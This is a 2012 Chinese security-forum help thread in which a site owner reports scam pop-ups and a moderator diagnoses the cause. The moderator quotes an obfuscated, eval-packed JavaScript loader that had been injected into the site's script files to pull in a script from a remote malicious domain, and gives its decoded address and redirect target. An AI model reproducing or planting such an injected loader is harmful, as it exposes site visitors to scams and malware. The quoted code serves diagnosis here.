我的网站在有右下角有挂马 bbs.ikaka.com

南京搬家 - 2012-3-12 16:03:00

我的网站在右下角有挂马，是QQ中奖信息，我想问一下怎么样能找到挂马，并把它删除，到时我请你吃饭网址是WWW.U8COM.COM

用户系统信息：Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MASM; .NET4.0C; 360SE)

南京搬家 - 2012-3-12 16:06:00

我想学习了，如能帮我的删除挂马，或者我免费帮你搬一次家，外地长途不算

networkedition - 2012-3-12 16:15:00

我这里访问没有弹出QQ中奖信息，但是网站多个js脚本里被写入如下代码：

[复制到剪贴板]

CODE:

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--)d[c.toString(a)]=k[c]||c.toString(a);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('a.9(\'<8 7="6://5.4.3/2/0.0"></1>\');',11,11,'js|script|news|com|txqq2010vip|www|http|src|SCRIPT|write|document'.split('|'),0,{}))

解密后地址是：http://www.txqq2010vip.com/news/js.js，访问这个地址会链接到这个：http://www.8d.cn/dmnr.php地址。

南京搬家 - 2012-3-13 14:28:00

谢谢版主，因我网站不是我自己做的所有我不太懂，我应该如何删除呢？我是不是要到空间FTP里面去找这些代码呢另外我的网站有时打开有QQ中奖信息，有时打开又没有，不是每次打开都有。QQ405908379，我请你吃饭

networkedition - 2012-3-14 10:39:00

网站打不开了。

南京搬家 - 2012-3-15 15:06:00

谢谢版主，我也打不开了，我去问空间商他们说我没有备案，但我原来是有备案的，怎么说我没有备案呢？去问域名商他们叫我问空间商，真郁闷，我都不知道该找谁

瑞星卡卡安全论坛